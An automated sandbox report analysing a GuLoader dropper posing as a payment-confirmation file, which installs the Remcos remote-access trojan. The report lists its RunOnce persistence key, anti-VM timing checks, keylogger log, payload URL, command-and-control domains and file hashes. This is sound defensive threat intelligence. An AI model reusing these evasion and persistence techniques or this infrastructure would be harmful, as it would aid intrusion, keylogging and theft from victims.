Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: mshtml.pdb source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000001.3527899003.0000000000649000.00000020.00000001.01000000.00000007.sdmp
Source:	Binary string: mshtml.pdbUGP source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000001.3527899003.0000000000649000.00000020.00000001.01000000.00000007.sdmp

Data Obfuscation

Yara detected GuLoader

Source: Yara match

File source: 00000000.00000002.3536097614.0000000006D99000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe

Code function: 0_2_6E311BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_6E311BFF

Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe

Code function: 0_2_6E3130C0 push eax; ret

0_2_6E3130EE

Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	File created: C:\Users\user\AppData\Local\Temp\fejlbetjening\Rockerfest.bat			Jump to dropped file
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	File created: C:\Users\user\AppData\Local\Temp\nsa1392.tmp\System.dll			Jump to dropped file

Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe

File created: C:\Users\user\AppData\Local\Temp\fejlbetjening\Rockerfest.bat

Jump to dropped file

Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Unvanquished	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Unvanquished	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Unvanquished	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce Unvanquished	Jump to behavior

Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Opens the same file many times (likely Sandbox evasion)

Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe

File opened: \Device\RasAcd count: 64074

Jump to behavior

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	API/Special instruction interceptor: Address: 744EFF8
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	API/Special instruction interceptor: Address: 5A4EFF8

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	RDTSC instruction interceptor: First address: 741446B second address: 741446B instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, 30F9070Dh 0x00000008 cmp ebx, ecx 0x0000000a jc 00007FA504F246E2h 0x0000000c test ebx, edx 0x0000000e inc ebp 0x0000000f inc ebx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	RDTSC instruction interceptor: First address: 5A1446B second address: 5A1446B instructions: 0x00000000 rdtsc 0x00000002 cmp ebx, 30F9070Dh 0x00000008 cmp ebx, ecx 0x0000000a jc 00007FA504C3EDB2h 0x0000000c test ebx, edx 0x0000000e inc ebp 0x0000000f inc ebx 0x00000010 rdtsc

Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Window / User API: threadDelayed 3403	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Window / User API: threadDelayed 605	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Window / User API: threadDelayed 3334	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Window / User API: foregroundWindowGot 1696	Jump to behavior

Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe

Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsa1392.tmp\System.dll

Jump to dropped file

Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe TID: 5616	Thread sleep count: 3403 > 30	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe TID: 6024	Thread sleep count: 605 > 30	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe TID: 6024	Thread sleep time: -1815000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe TID: 2508	Thread sleep count: 95 > 30	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe TID: 2508	Thread sleep time: -95000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe TID: 6024	Thread sleep count: 3334 > 30	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe TID: 6024	Thread sleep time: -10002000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe TID: 2508	Thread sleep count: 31 > 30	Jump to behavior
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe TID: 2508	Thread sleep time: -31000s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe

Thread sleep count: Count: 3403 delay: -5

Jump to behavior

Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Code function: 0_2_004069DF FindFirstFileW,FindClose,	0_2_004069DF
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Code function: 0_2_00405D8E CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	0_2_00405D8E
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	Code function: 0_2_00402910 FindFirstFileW,	0_2_00402910

Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000002.4609214805.0000000006A39000.00000004.00000020.00020000.00000000.sdmp, inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000002.4609214805.00000000069D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000002.4609214805.0000000006A39000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW`

Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	API call chain: ExitProcess graph end node			graph_0-4395
Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	API call chain: ExitProcess graph end node			graph_0-4400

Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe

0_2_00403645

Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe

Code function: 0_2_6E311BFF GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,

0_2_6E311BFF

Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe

Process created: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe "C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe"

Jump to behavior

Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000002.4609214805.0000000006A4C000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerG
Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000002.4609214805.0000000006A4C000.00000004.00000020.00020000.00000000.sdmp, inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000002.4609214805.00000000069D8000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerIG\
Source: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000002.4609214805.00000000069D8000.00000004.00000020.00020000.00000000.sdmp, logs.dat.4.dr	Binary or memory string: [Program Manager]

Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe

0_2_00403645

Stealing of Sensitive Information

Yara detected Remcos RAT

Source: Yara match	File source: 00000004.00000002.4630508505.00000000368EE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4609214805.0000000006A16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4609214805.0000000006A4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe PID: 5888, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Remote Access Functionality

Detected Remcos RAT

Source: C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe

Mutex created: \Sessions\1\BaseNamedObjects\Rmc-0B1XIG

Jump to behavior

Yara detected Remcos RAT

Source: Yara match	File source: 00000004.00000002.4630508505.00000000368EE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4609214805.0000000006A16000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.4609214805.0000000006A4C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe PID: 5888, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Native API	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	11 Masquerading	11 Input Capture	31 Security Software Discovery	Remote Services	11 Input Capture	11 Encrypted Channel	Exfiltration Over Other Network Medium	1 System Shutdown/Reboot
Credentials	Domains	Default Accounts	Scheduled Task/Job	1 DLL Side-Loading	12 Process Injection	12 Virtualization/Sandbox Evasion	LSASS Memory	12 Virtualization/Sandbox Evasion	Remote Desktop Protocol	1 Archive Collected Data	1 Remote Access Software	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 Registry Run Keys / Startup Folder	1 Access Token Manipulation	Security Account Manager	1 Process Discovery	SMB/Windows Admin Shares	1 Clipboard Data	1 Ingress Tool Transfer	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	1 DLL Side-Loading	12 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	2 Non-Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Obfuscated Files or Information	LSA Secrets	3 File and Directory Discovery	SSH	Keylogging	113 Application Layer Protocol	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	23 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	35%	Virustotal		Browse
inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe	26%	ReversingLabs

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\Temp\fejlbetjening\Rockerfest.bat	26%	ReversingLabs
C:\Users\user\AppData\Local\Temp\nsa1392.tmp\System.dll	0%	ReversingLabs

Source	Detection	Scanner	Label
https://teldrum.ro/NJrdZqNcCtz102.bin;	0%	Avira URL Cloud	safe
https://teldrum.ro/NJrdZqNcCtz102.bin	0%	Avira URL Cloud	safe
https://teldrum.ro/	0%	Avira URL Cloud	safe
linktreewealthy.zapto.org	0%	Avira URL Cloud	safe
linktreewealth.zapto.org	0%	Avira URL Cloud	safe
https://teldrum.ro/NJrdZqNcCtz102.bin7	0%	Avira URL Cloud	safe
https://teldrum.ro/NJrdZqNcCtz102.binOpklsLedcrestereamuschilor.ro/NJrdZqNcCtz102.bin	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
linktreewealth.zapto.org	0.0.0.0	true	true	unknown
teldrum.ro	109.99.162.14	true	false	unknown
linktreewealthy.zapto.org	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
linktreewealth.zapto.org	true	Avira URL Cloud: safe	unknown
linktreewealthy.zapto.org	true	Avira URL Cloud: safe	unknown
https://teldrum.ro/NJrdZqNcCtz102.bin	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd	inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000001.3527899003.00000000005F2000.00000020.00000001.01000000.00000007.sdmp	false		high
http://www.ftp.ftp://ftp.gopher.	inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000001.3527899003.0000000000649000.00000020.00000001.01000000.00000007.sdmp	false		high
http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd	inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000001.3527899003.00000000005F2000.00000020.00000001.01000000.00000007.sdmp	false		high
https://teldrum.ro/NJrdZqNcCtz102.bin;	inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000002.4609214805.00000000069D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nsis.sf.net/NSIS_ErrorError	inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, Rockerfest.bat.4.dr	false		high
https://teldrum.ro/NJrdZqNcCtz102.bin7	inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000002.4609214805.0000000006A16000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://teldrum.ro/	inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000002.4609214805.00000000069D8000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214	inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000001.3527899003.0000000000649000.00000020.00000001.01000000.00000007.sdmp	false		high
https://teldrum.ro/NJrdZqNcCtz102.binOpklsLedcrestereamuschilor.ro/NJrdZqNcCtz102.bin	inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe, 00000004.00000002.4629681766.0000000035F30000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
109.99.162.14	teldrum.ro	Romania		9050	RTDBucharestRomaniaRO	false

General Information

Joe Sandbox version:	42.0.0 Malachite
Analysis ID:	1590830
Start date and time:	2025-01-14 16:31:56 +01:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 9m 9s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	5
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Sample name:	inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.winEXE@3/10@20/1
EGA Information:	Successful, ratio: 50%
HCA Information:	Successful, ratio: 85% Number of executed functions: 47 Number of non-executed functions: 34
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240s for sample files taking high CPU consumption

Warnings

Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
Excluded IPs from analysis (whitelisted): 13.107.246.45, 4.175.87.197
Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
10:36:07	API Interceptor	199351x Sleep call for process: inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe modified
16:35:27	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Unvanquished C:\Users\user\AppData\Local\Temp\fejlbetjening\Rockerfest.bat
16:35:35	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Unvanquished C:\Users\user\AppData\Local\Temp\fejlbetjening\Rockerfest.bat

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
109.99.162.14	2T10XBqS6g.exe	Get hash	malicious	Remcos, GuLoader	Browse
	DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe	Get hash	malicious	Remcos	Browse
	z58Swiftcopy_MT.bat.exe	Get hash	malicious	Remcos, GuLoader	Browse
	DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe	Get hash	malicious	Remcos, GuLoader	Browse
	DHL_119040 receipt document,pdf.exe	Get hash	malicious	AgentTesla	Browse
	SecuriteInfo.com.W32.MSIL_Kryptik.HRZ.genEldorado.12789.exe	Get hash	malicious	AgentTesla	Browse
	SecuriteInfo.com.TrojanSpy.MSIL.Kryptik.bfb22406.2449.exe	Get hash	malicious	AgentTesla	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
linktreewealth.zapto.org	2T10XBqS6g.exe	Get hash	malicious	Remcos, GuLoader	Browse	43.226.229.209
teldrum.ro	2T10XBqS6g.exe	Get hash	malicious	Remcos, GuLoader	Browse	109.99.162.14
	DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe	Get hash	malicious	Remcos	Browse	109.99.162.14
	z58Swiftcopy_MT.bat.exe	Get hash	malicious	Remcos, GuLoader	Browse	109.99.162.14
	DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe	Get hash	malicious	Remcos, GuLoader	Browse	109.99.162.14

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
RTDBucharestRomaniaRO	ppc.elf	Get hash	malicious	Unknown	Browse	80.97.224.140
	arm7.elf	Get hash	malicious	Mirai	Browse	109.102.20.98
	2T10XBqS6g.exe	Get hash	malicious	Remcos, GuLoader	Browse	109.99.162.14
	4.elf	Get hash	malicious	Unknown	Browse	193.231.241.68
	Fantazy.m68k.elf	Get hash	malicious	Unknown	Browse	92.83.30.89
	3.elf	Get hash	malicious	Unknown	Browse	109.99.173.54
	DHL_Awb_Shipping_Invoice_doc_010720257820020031808174CN1800301072025.bat.exe	Get hash	malicious	Remcos	Browse	109.99.162.14

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
37f463bf4616ecd445d4a1937da06e19	1KaTo6P18Z.doc	Get hash	malicious	Unknown	Browse	109.99.162.14
	5UnAIdF7m2.docx	Get hash	malicious	Unknown	Browse	109.99.162.14
	2T10XBqS6g.exe	Get hash	malicious	Remcos, GuLoader	Browse	109.99.162.14
	183643586-388657435.07.exe	Get hash	malicious	Unknown	Browse	109.99.162.14
	Handler.exe	Get hash	malicious	DanaBot, Vidar	Browse	109.99.162.14
	sysadmin.exe	Get hash	malicious	Vidar	Browse	109.99.162.14

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Temp\nsa1392.tmp\System.dll	2T10XBqS6g.exe	Get hash	malicious	Remcos, GuLoader	Browse
	2T10XBqS6g.exe	Get hash	malicious	GuLoader	Browse
	2T10XBqS6g.exe	Get hash	malicious	GuLoader	Browse
	2T10XBqS6g.exe	Get hash	malicious	GuLoader	Browse
	ZAMOWIEN.BAT.exe	Get hash	malicious	FormBook, GuLoader	Browse
	https://github.com/Ultimaker/Cura/releases/download/5.9.0/UltiMaker-Cura-5.9.0-win64-X64.exe	Get hash	malicious	Unknown	Browse
	RFQ_BDS636011.exe	Get hash	malicious	FormBook, GuLoader	Browse

Created / dropped Files

C:\ProgramData\remcos\logs.dat

Download File

Process:	C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	162
Entropy (8bit):	3.3898151468438855
Encrypted:	false
SSDEEP:	3:rglsKlENzlNWlwfU5JWRal2Jl+7R0DAlBG4moojklovDl6v:Mls5Nz+x5YcIeeDAlS1gWAv
MD5:	600D3381E61A54CF5C53093AC19FF10C
SHA1:	3735B172E4B504751811F942BE362E6D961A7443
SHA-256:	98929F38F05FBCB77BD78442EEF50C0BAC29B26D07C2C5F3C7C2B15E3D0273FF
SHA-512:	2642DDF0A078D3D27134C4C5622D45FCD2A9C7FD9D1A7A35DC1C7DFE472AFEB6A4033265363AF689A248D021E06849C0B84AAEE11D53DF135F2137C04A87ACD6
Malicious:	true
Yara Hits:	Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: C:\ProgramData\remcos\logs.dat, Author: Joe Security
Reputation:	low
Preview:	....[.2.0.2.5./.0.1./.1.4. .1.0.:.3.5.:.3.5. .O.f.f.l.i.n.e. .K.e.y.l.o.g.g.e.r. .S.t.a.r.t.e.d.].........[.R.u.n.].........[.P.r.o.g.r.a.m. .M.a.n.a.g.e.r.].....

C:\Users\user\AppData\Local\Temp\Setup.ini

Download File

Process:	C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	25
Entropy (8bit):	4.0536606896881855
Encrypted:	false
SSDEEP:	3:8+dB4WYiTNvn:8AbYiTNvn
MD5:	08CA75DA54EB4810D18796C97F510A55
SHA1:	3D9B020193D16E7D0F5392EF7693A6C5C6D2531D
SHA-256:	E628D2EE9FE054256B42FFDEC449254437949DEB45B13354D515579CE3E0618E
SHA-512:	46D71D69FDCBF9069E74C1176080637A1356E747FA1A1C852172CF0BB36F44ED7D741EB6DF029F333D690E500462DFC9EDEB8B4EB7BB9642C907B792F30DED9A
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	[Bus Clock]..Gats=Galse..

C:\Users\user\AppData\Local\Temp\fejlbetjening\Rockerfest.bat

Download File

Process:	C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	550217
Entropy (8bit):	7.712228071105721
Encrypted:	false
SSDEEP:	6144:UnPdudwDCVOCg2G4A+uxXCpzna3MSzy99s5sbro5kd+B4hJ1QQsSGuhkrpzOUlec:UnPdMg2H8SpzaThHy7mzOUlvnVMs3e+
MD5:	25EEC63EDF7C0EB8628A89712B5CB363
SHA1:	4E8D586A950492C30147B7D56BCFAD49CD577966
SHA-256:	E075807417590255DE4D395FA3DFBC336E88C96BBAB8AFCA1D5E5D5ABBAC0237
SHA-512:	086FEB119E2A02F2FD7AFC45C422F9B472F049EB2E79F83769F25254D88A84086275D2CFF1E891D360EA57978292CD0CAF958E4000CD659AC532165E1F881DFB
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 26%
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1 ..PN..PN..PN._...PN..PO.JPN._...PN.s~..PN..VH..PN.Rich.PN.........................PE..L...g.d.................h..."......E6............@..........................0............@.............................................X............................................................................................................text....f.......h.................. ..`.rdata..X............l..............@..@.data...x...........................@....ndata...................................rsrc...X...........................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsa12F5.tmp

Download File

Process:	C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe
File Type:	data
Category:	dropped
Size (bytes):	1091527
Entropy (8bit):	3.7883797592579986
Encrypted:	false
SSDEEP:	12288:qvZYo2Z5DAmaghhFm2YqtP4lIxgBVLpadBoS9CR:8YdJagOWP4EeVLeOF
MD5:	714AB9E19CCDB0A431DB45B3EFD1D462
SHA1:	C61D1E403FDF00B6FC47481D1C56BE7368A496E7
SHA-256:	2B9B7C3E4EA530F8AE338734ED61B365F0A124687EE88BEAE57E07259B0DCE66
SHA-512:	A6E108B4787A8EA44BC6187960FBEC6B5C7954ED6695060C4BE8A88B579928CA31E4E30501374F9F896DEF92438EE1A04C2DBDA6CD4255E24587DE4741595F0B
Malicious:	false
Reputation:	low
Preview:	........,...................X...d.......d...................................................................................................................................................................................................................................................G...Y...........q...j...............................................................................................................................b.......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nsa1392.tmp\System.dll

Download File

Process:	C:\Users\user\Desktop\inward_payment_confirmation_reference_Z1766053541_notifications.bat.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	12288
Entropy (8bit):	5.805604762622714
Encrypted:	false
SSDEEP:	192:VjHcQ0qWTlt7wi5Aj/lM0sEWD/wtYbBjpNQybC7y+XZv0QPi:B/Qlt7wiij/lMRv/9V4bvr
MD5:	4ADD245D4BA34B04F213409BFE504C07
SHA1:	EF756D6581D70E87D58CC4982E3F4D18E0EA5B09
SHA-256:	9111099EFE9D5C9B391DC132B2FAF0A3851A760D4106D5368E30AC744EB42706
SHA-512:	1BD260CABE5EA3CEFBBC675162F30092AB157893510F45A1B571489E03EBB2903C55F64F89812754D3FE03C8F10012B8078D1261A7E73AC1F87C82F714BCE03D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: 2T10XBqS6g.exe, Detection: malicious, Browse Filename: 2T10XBqS6g.exe, Detection: malicious, Browse Filename: 2T10XBqS6g.exe, Detection: malicious, Browse Filename: 2T10XBqS6g.exe, Detection: malicious, Browse Filename: ZAMOWIEN.BAT.exe, Detection: malicious, Browse Filename: , Detection: malicious, Browse Filename: RFQ_BDS636011.exe, Detection: malicious, Browse
